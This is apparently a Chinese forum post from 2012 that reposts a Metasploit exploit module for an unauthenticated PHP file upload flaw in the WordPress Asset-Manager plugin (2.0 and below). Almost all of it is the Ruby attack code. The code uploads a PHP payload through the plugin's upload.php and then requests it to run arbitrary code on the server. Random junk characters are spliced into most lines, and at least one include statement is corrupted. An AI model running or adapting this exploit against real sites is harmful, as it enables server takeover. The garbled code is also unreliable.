这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。6 v B9 b0 Z, j
/ W1 t3 {1 ]% C0 ]' U( w n
##
- L3 ?1 ~5 v+ j( @6 o# This file is part of the Metasploit Framework and may be subject to' @8 D% R- Y/ d$ E' s" m
# redistribution and commercial restrictions. Please see the Metasploit
8 @" ? n, c$ o( Z6 R1 r4 D% o# Framework web site for more information on licensing and terms of use.) Z+ ~1 P1 M- z; i$ B
# http://metasploit.com/framework/& {4 _( T5 b& u- f/ v: D" W: d c
##- I& L4 ?0 X9 L) s
! H' y2 B p6 W7 T1 |$ B
require 'msf/core'
+ Z2 V% v0 y( Y" k7 S7 d# hrequire 'msf/core/exploit/php_exe'
) C. g8 M( W- ^: N3 l/ F
5 f2 o% X. [5 _) `/ m5 B0 |4 y& ~class Metasploit3 < Msf::Exploit::Remote/ b l: W8 u: V0 f- D7 u
Rank = ExcellentRanking" r3 [; u% d- ^2 p3 A2 U& I$ g
/ K4 {9 i9 F- w" K: w' X9 R
include Msf::Exploit::Remote::HttpClient
& f9 G. c5 f% e include Msf::Exploit: hpEXE
/ {: k! B& e6 ^9 n) n+ ~% C2 k9 e: U! M & r i3 f, t1 ]# w( L1 B& l
def initialize(info = {})
! \9 N6 R9 [) q" t6 ^) H7 @ super(update_info(info,
4 T& z. A* Y+ `8 @ 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',0 R; S8 b/ v3 k( \
'Description' => %q{2 b: E5 w! u0 ], q2 {* F8 [
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
: a- c* h1 t( w: c/ f0 `9 C plugin. By abusing the upload.php file, a malicious user can upload a file to a
/ |( _" m/ j0 z+ N1 C/ O7 Z temp directory without authentication, which results in arbitrary code execution.
- p/ _7 G2 g8 k7 _# B5 z. r },$ [$ E3 U$ Q8 p* x- Q( Z3 f
'Author' =>
, J. o8 R" q% H$ N; V: E9 e [7 v$ A) z( s- W5 a0 s) i' J, f
'Sammy FORGIT', # initial discovery
2 ?7 e) Q+ r7 S% W* \# _/ t 'James Fitts <fitts.james[at]gmail.com>' # metasploit module: V6 `" c: C$ o3 F
],! X& e& ~ a& \: Q8 m: v3 u! F
'License' => MSF_LICENSE,4 {! L* v/ D: _. ]2 C5 |! v
'References' =>
I+ k5 R1 f4 R( S& u [- u1 `: ?8 _% C
[ 'OSVDB', '82653' ],1 ?# G& K1 H, A" m
[ 'BID', '53809' ],( B7 @/ l/ w8 j6 D
[ 'EDB', '18993' ],6 B- Q) ]! n: W) e' k
[ 'URL', 'http:// www.myhack58.com /' ]
2 r( q; o, ~8 }2 i+ ?& s ],
* v8 ]* ?6 I0 @ 'Payload' =>
2 ]/ O- d; _- h {7 I$ |' q5 C- o, t8 b
'BadChars' => "\x00",- [+ f4 U4 ^6 F* L
},
1 N, F' [2 m' e5 j$ F" n2 ?( I& s, n* W2 s 'Platform' => 'php',
: a8 f) x8 c3 k' ? 'Arch' => ARCH_PHP,
; U, G1 C9 C5 W9 [ 'Targets' =>
1 k. R/ W! {+ b# L [
5 O: `# ]( g8 c7 j. _) u( D: k [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
5 o' r2 A+ {- F0 R [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 v) H8 T. I) N5 I% E
],: R, {, |. j, H7 \7 f4 s
'DefaultTarget' => 0,
) S& |- }9 ]8 w! S" D 'DisclosureDate' => 'May 26 2012'))6 P/ ]1 n, M+ u
& }4 H/ P1 E1 i, a: G; e
register_options(* q- @; W* z, h4 |6 N( e9 T3 u
[
2 }& Z! K% J# n OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" n# n. @6 m( l7 l ], self.class)
* N3 }1 ]0 c" S2 B9 S end/ Z( O0 `* F* Q' Y" }1 z. E
5 E9 T# c& C3 A# X# G3 @* I9 }, o/ N
def exploit& Z+ {: ^, w, e' }$ V
uri = target_uri.path
+ B) H: B+ i# R uri << '/' if uri[-1,1] != '/'
7 E7 [" ?7 Q# e peer = "#{rhost}:#{rport}"/ f% s) K. f5 W1 t4 T
payload_name = "#{rand_text_alpha(5)}.php"" m- c& j" k Q( L% M; {3 t# v3 r/ I3 c( y
php_payload = get_write_exec_payload(:unlink_self=>true)" ^, P: M2 X4 [5 {
1 g- m5 t. S4 e" h& E) g5 M
data = Rex::MIME::Message.new. Z! W- j {9 Y5 {8 N$ Z
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
8 p( D( ]# ?/ k$ ^" h post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' Y* x0 |5 \! M7 K6 v, }
9 n% X4 ]" V. A+ t( \ print_status("#{peer} - Uploading payload #{payload_name}")# t0 U1 L' j# q
res = send_request_cgi({/ f9 a$ M, c/ w7 X
'method' => 'POST',
' g7 j, ~' c) o! p a 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ l5 t5 a3 U9 `9 G K( c- F 'ctype' => "multipart/form-data; boundary=#{data.bound}",
4 d9 g$ ]3 l2 _8 x( T 'data' => post_data
' E B: [* M6 y })# R2 k; x- X+ U ^; ~
1 ^! u( x O& e) d! _* a- {1 t
if not res or res.code != 200 or res.body !~ /#{payload_name}/( ^* l: ?7 p3 i7 d4 i M9 d) w0 L
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; z0 B! W. d4 o( L# Send
1 p: N( t8 X* F, R; f3 k
9 a% i$ t- W- |' G1 e# u print_status("#{peer} - Executing payload #{payload_name}")
; v( A! A( Z. I& B res = send_request_raw({
3 T; J0 y w* t" E9 r 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",7 _" g# [2 x* s2 K
'method' => 'GET' C: L9 `, a" N+ b8 c9 c5 y" J
})
) y* `; e( g4 U* |, y+ x# n J* Q: @. h4 ?8 V* g$ L- S& `" U
if res and res.code != 200
( G% Q2 A# f, b. V fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 ?4 i) q: K4 q- \" C* O end
& i5 N5 |- Q- n2 ?0 j end
0 j: L, q& R+ R- J' q( Iend* N6 O6 Z& Z# l- b7 i" Z
|
发表于 2012-12-31 09:22:33
收藏
支持
反对